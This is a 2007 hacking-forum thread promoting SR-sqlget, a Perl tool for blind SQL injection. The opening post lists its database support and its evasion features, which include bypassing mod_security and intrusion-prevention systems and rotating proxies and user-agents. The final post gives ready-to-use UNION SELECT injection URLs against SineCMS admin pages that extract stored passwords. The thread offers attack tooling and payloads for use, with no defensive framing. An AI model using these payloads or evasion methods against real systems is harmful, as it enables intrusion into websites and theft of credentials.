[Tool] Blind SQL Injection

lostos · July 6, 2007

Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through sql statements.

Information provided by Infobyte

SR-sqlget: It's a blind SQL injection tool developed in Perl. It lets you get databases schemas and tables rows. Using a single GET/POST you can access quietly the database structure and using a single GET/POST you can dump every table row to a csv-like file.

Databases supported:

- IBM DB2

- Microsoft SQL Server

- Oracle

- Postgres

- Mysql

- IBM Informix

- Sybase

- Hsqldb (www.hsqldb.org)

- Mimer (www.mimer.com)

- Pervasive (www.pervasive.com)

- Virtuoso (virtuoso.openlinksw.com)

- SQLite

- Interbase/Yaffil/Firebird (Borland)

- H2 (http://www.h2database.com)

- Mckoi (http://mckoi.com/database/)

- Ingres (http://www.ingres.com)

- MonetDB (http://www.monetdb.nl)

- MaxDB (www.mysql.com/products/maxdb/)

- ThinkSQL (http://www.thinksql.co.uk/)

- SQLBase (http://www.unify.com)

Evasion features:

- Full-width/Half-width Unicode encoding

- Apache non standard CR bypass

- mod_security bypass

- Random uppercase request transform

- PHP Magicquotes: encode every string using db CHR function or similar.

- Convert requests to hexadecimal values

- Avoid non-space replacing for /**/ or (\t) tab

- Avoid non || or + concatenation using db concat function or similar.

- Random user-agent

- Random proxy-server

- Random delay request

Common features:

- Database schemate download blacklist

- Cookie array support

- SSL support

- Proxy server support

- Database information dumped in csv format

Reporting:

- Database structure graphication to create impact executive reports require Graphviz library (http://www.graphviz.org/)

Demo:

- Demo features (bypassing IBM ISS Proventia IPS) - http://www.infobyte.com.ar/demo/ISR_sqlget_ISS_proventia_bypass.html

Loverboy · July 26, 2007

nice share...you should try Absinthe too

Kagan · August 12, 2007

too much information for my brains

lazos1993 · August 14, 2007

it's too complicated ^_^

SoulShade · November 21, 2007

Hmm sorry for posting in quite old post...But i think its the apropriate place to ask this:

I dont know nothing about mysql injections, so, i want to know how its done...How can i Insert or Read data from a database with an injection...Info plix, thnx:D

complex · November 23, 2007

Injecting SQL walk through -- http://www.securiteam.com/securityreviews/5DP0N1P76E.html

anath3ma · December 12, 2007

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,

6+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9

+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

[Tool] Blind SQL Injection

Recommended Posts

lostos

Loverboy

Kagan

lazos1993

SoulShade

complex

anath3ma

Join the conversation

Posts

Topics

Browse

Activity

Store